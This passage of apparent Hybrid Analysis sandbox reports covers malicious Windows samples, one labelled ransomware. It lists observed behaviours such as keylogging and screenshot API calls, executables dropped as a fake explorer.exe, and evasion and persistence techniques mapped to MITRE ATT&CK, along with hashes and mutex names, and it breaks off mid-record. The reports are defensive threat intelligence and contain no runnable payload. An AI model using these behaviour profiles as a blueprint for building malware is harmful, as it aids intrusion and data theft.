"informative", "category": "Spyware/Information Retrieval", "identifier": "api-105", "type": 6, "relevance": 3, "name": "Calls an API possibly used to take screenshots", "description": "\"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"922815837\"\n \"cx\": \"269\"\n \"cy\": \"25\"}\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"100731007\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"100731007\"\n \"cx\": \"269\"\n \"cy\": \"25\"}", "origin": "API Call", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "string-64", "type": 2, "relevance": 10, "name": "Input file contains API references not part of its Import Address Table (IAT)", "description": "Found string \"RtlMoveMemory\" (Source: f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c, API is part of module: NTDLL.DLL)\n Found string \"RtlComputeCrc32\" (Source: f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c, API is part of module: NTDLL.DLL)", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "binary-38", "type": 8, "relevance": 5, "name": "Drops PE files with different extensions", "description": "\"RCXCD0E.tmp\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%PROGRAMFILES%\\Windows NT\\RCXCD0E.tmp]- [targetUID: 00000000-00005896]", "origin": "Binary File", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" wrote 18432 bytes starting with PE header signature to file \"C:\\Program Files\\Windows NT\\explorer.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" wrote 448 bytes starting with PE header signature to file \"C:\\Program Files\\Windows NT\\RCXCD0E.tmp\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"explorer.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%PROGRAMFILES%\\Windows NT\\explorer.exe]- [targetUID: 00000000-00005896]\n \"RCXCD0E.tmp\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%PROGRAMFILES%\\Windows NT\\RCXCD0E.tmp]- [targetUID: 00000000-00005896]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Spyware/Information Retrieval", "identifier": "api-40", "type": 6, "relevance": 10, "name": "Calls an API typically used for keylogging", "description": "\"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" called \"GetKeyState\" with parameters {\"nVirtKey\": \"18\"}\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" called \"GetKeyState\" with parameters {\"nVirtKey\": \"17\"}\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" called \"GetKeyState\" with parameters {\"nVirtKey\": \"16\"}\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" called \"GetKeyState\" with parameters {\"nVirtKey\": \"91\"}\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" called \"GetKeyState\" with parameters {\"nVirtKey\": \"92\"}", "origin": "API Call", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" opened \"C:\\Program Files\\Windows NT\\RCXCD0E.tmp\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "api-35", "type": 6, "relevance": 5, "name": "Checks for a resource fork (ADS) file", "description": "\"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" checked file \"C:\\Program Files\\Windows NT\\explorer.exe:Zone.Identifier\"", "origin": "API Call", "attck_id": "T1564.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a
https://hybrid-analysis.com/sample/37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a
Hybrid Analysis - Ransomware
{"size": 775944, "type": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "submit_name": "37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a", "sha256": "37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a", "av_detect": 87, "vx_family": "Trojan.Generic", "threat_score": 85, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_processes": 3, "total_signatures": 170, "extracted_files": [{"name": "085cda53603755dc.exe", "file_path": "%TEMP%\\085cda53603755dc.exe", "file_size": 775948, "sha256": "e91c931efc8273ff85e04eb68c1b7df30ebc32cefaa94e947e130d1cc9c97555", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "085cda53603755dc.exe (PID: 5656)", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "processes": [{"uid": "00000000-00005640", "name": "37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe", "normalized_path": "C:\\37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe", "sha256": "37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a"}, {"uid": "00000000-00005656", "parentuid": "00000000-00005640", "name": "085cda53603755dc.exe", "normalized_path": "%TEMP%\\085cda53603755dc.exe", "command_line": ":*C:\\37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe *", "sha256": "e91c931efc8273ff85e04eb68c1b7df30ebc32cefaa94e947e130d1cc9c97555"}, {"uid": "00000000-00005476", "parentuid": "00000000-00005656", "name": "085cda53603755dc.exe", "normalized_path": "%TEMP%\\085cda53603755dc.exe", "command_line": "a ZZZZZZUTUTG", "sha256": "e91c931efc8273ff85e04eb68c1b7df30ebc32cefaa94e947e130d1cc9c97555"}], "mitre_attcks": [{"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 6, "informative_identifiers_count": 13}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Service Execution", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002", "informative_identifiers_count": 1, "parent": {"technique": "System Services", "attck_id": "T1569", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Persistence", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 2, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "suspicious_identifiers_count": 2, "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 2, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Thread Local Storage", "attck_id": "T1055.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/005", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Make and Impersonate Token", "attck_id": "T1134.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/003", "suspicious_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "suspicious_identifiers_count": 1, "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "suspicious_identifiers_count": 2, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 3, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 2, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 3, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Thread Local Storage", "attck_id": "T1055.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/005", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Safe Mode Boot", "attck_id": "T1562.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Dynamic API Resolution", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal from Tools", "attck_id": "T1027.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/005", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Make and Impersonate Token", "attck_id": "T1134.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/003", "suspicious_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "informative_identifiers_count": 9}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 3, "informative_identifiers_count": 15}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Security Software Discovery", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}}, {"tactic": "Discovery", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 3, "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "Remote System Discovery", "attck_id": "T1018", "attck_id_wiki": "https://attack.mitre.org/techniques/T1018", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "suspicious_identifiers_count": 2, "informative_identifiers_count": 6}, {"tactic": "Discovery", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 3, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Network Configuration Discovery", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Lateral Tool Transfer", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 5}, {"tactic": "Command and Control", "technique": "Non-Application Layer Protocol", "attck_id": "T1095", "attck_id_wiki": "https://attack.mitre.org/techniques/T1095", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 3, "informative_identifiers_count": 4}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "informative_identifiers_count": 3, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "System Shutdown/Reboot", "attck_id": "T1529", "attck_id_wiki": "https://attack.mitre.org/techniques/T1529", "malicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "api-267", "type": 6, "relevance": 1, "name": "Writes files in a temp directory", "description": "\"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\"", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\Global\\giojheiowrghtiovhjwiojrug\"\n \"Global\\giojheiowrghtiovhjwiojrug\"\n \"\\Sessions\\1\\BaseNamedObjects\\Global\\giojheiowrghtiovhjwiojrugzyb\"\n \"Global\\giojheiowrghtiovhjwiojrugzyb\"", "origin": "Created Mutant"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"085cda53603755dc.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a\" file has an entrypoint instructions - \"sub\tesp, 0xc,mov\tdword ptr [0x534fd4], 1,call\t0x4131e0,add\tesp, 0xc,jmp\t0x401180,lea\tesi, [esi],sub\tesp, 